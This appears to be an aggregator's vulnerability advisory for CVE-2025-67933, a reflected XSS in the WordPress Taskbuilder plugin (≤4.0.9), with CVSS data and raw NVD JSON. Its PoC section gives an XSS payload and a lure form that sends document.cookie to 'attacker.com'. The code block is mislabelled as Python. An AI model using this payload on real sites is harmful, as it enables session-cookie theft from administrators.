Security Vulnerability Report
中文
CVE-2025-67933 CVSS 7.1 HIGH

CVE-2025-67933

Published: 2026-01-08 10:15:52
Last Modified: 2026-04-27 18:16:50

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in taskbuilder Taskbuilder taskbuilder allows Reflected XSS.This issue affects Taskbuilder: from n/a through <= 4.0.9.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Taskbuilder <= 4.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-67933 Reflected XSS PoC --> <!-- Target: WordPress Taskbuilder Plugin <= 4.0.9 --> <!-- Malicious URL that triggers the XSS --> <!-- Replace 'TARGET_URL' with the vulnerable WordPress site --> <script> // Construct the malicious URL with XSS payload const targetUrl = 'TARGET_URL'; const xssPayload = '<script>alert(document.cookie)</script>'; const maliciousUrl = `${targetUrl}/wp-admin/admin.php?page=taskbuilder&task="${encodeURIComponent(xssPayload)}"`; console.log('Malicious URL:', maliciousUrl); console.log('Share this URL with authenticated WordPress users'); </script> <!-- HTML form for social engineering attack --> <form action="TARGET_URL/wp-admin/admin.php" method="GET"> <input type="hidden" name="page" value="taskbuilder"> <input type="hidden" name="task" value='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'> <input type="submit" value="Click me"> </form>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67933", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:52.393", "lastModified": "2026-04-27T18:16:50.480", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in taskbuilder Taskbuilder taskbuilder allows Reflected XSS.This issue affects Taskbuilder: from n/a through <= 4.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/taskbuilder/vulnerability/wordpress-taskbuilder-plugin-4-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}